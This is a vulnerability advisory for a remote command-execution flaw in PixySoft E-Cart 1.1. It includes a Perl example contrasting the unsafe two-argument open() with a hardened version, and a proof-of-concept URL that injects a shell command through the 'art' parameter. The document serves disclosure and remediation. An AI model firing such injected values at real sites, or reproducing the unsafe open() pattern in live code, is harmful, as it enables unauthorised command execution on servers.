PixySoft E-Cart Art Parameter Remote Command Execution Vulnerability
BID:13321
Info
| Bugtraq ID: | 13321 |
| Class: | Input Validation Error |
| CVE: | CVE-2005-1289 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 22 2005 12:00AM |
| Updated: | Jul 12 2009 02:06PM |
| Credit: | Discovery is credited to Inaki Cormenzana. |
| Vulnerable: | PixySoft E-Cart 1.1 |
| Not Vulnerable: | |
Discussion
PixySoft E-Cart is prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.
Specifically, the user-specified 'art' URI parameter is supplied to a Perl open() routine.
PixySoft E-Cart version 1.1 is reported vulnerable to this issue.
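The following is an added illustration, not E-Cart's own code: it shows why passing the 'art' value to Perl's two-argument open() lets a trailing '|' turn a file name into a command pipeline, and the hardened form (an allowlist check plus three-argument open()) that a fix would use. The data directory, category layout and function names are assumptions.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed layout: one .dat file per article under a per-category directory.
my $datadir = '/var/www/ecart/data';   # assumed path

# Vulnerable pattern (the class of bug described above): two-argument open()
# derives the mode from the string itself, so an 'art' value such as
# "file.dat|uname -a|" is opened as a pipe from a shell command, not a file.
sub read_article_unsafe {
    my ($cat, $art) = @_;
    open(my $fh, "$datadir/$cat/$art") or return undef;
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Allowlist check for the two URI parameters: a category is a plain token,
# an article name is a plain token ending in ".dat". Pipes, slashes, spaces
# and other shell metacharacters are rejected before any file access.
sub params_are_valid {
    my ($cat, $art) = @_;
    return 0 unless defined $cat && $cat =~ /\A[A-Za-z0-9_-]+\z/;
    return 0 unless defined $art && $art =~ /\A[A-Za-z0-9_-]+\.dat\z/;
    return 1;
}

# Hardened pattern: validate first, then use three-argument open() with an
# explicit '<' mode so the path is always treated as a literal file name.
sub read_article_safe {
    my ($cat, $art) = @_;
    return undef unless params_are_valid($cat, $art);
    open(my $fh, '<', "$datadir/$cat/$art") or return undef;
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Run the check against constructed values mirroring the proof of concept
# (nothing is read from disk when validation rejects the input).
my $cat = 'reproductores_dvd';
for my $art ('reproductordvp-ns315.dat', 'reproductordvp-ns315.dat|uname -a|') {
    printf "%-40s => %s\n", $art,
        params_are_valid($cat, $art) ? 'accepted' : 'rejected';
}
```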
Exploit / POC
An exploit is not required.
The following proof of concept is available:
http://www.example.com/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|
SoulBlack has provided the following exploit:
http://www.soulblack.com.ar/repo/tools/ecart-xpl.php
The following script has been provided that supplies a connect back shell:
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
References:
- E-Cart Homepage (PixySoft)
- E-Cart v1.1 Remote Command Execution (Nicolas Montoza)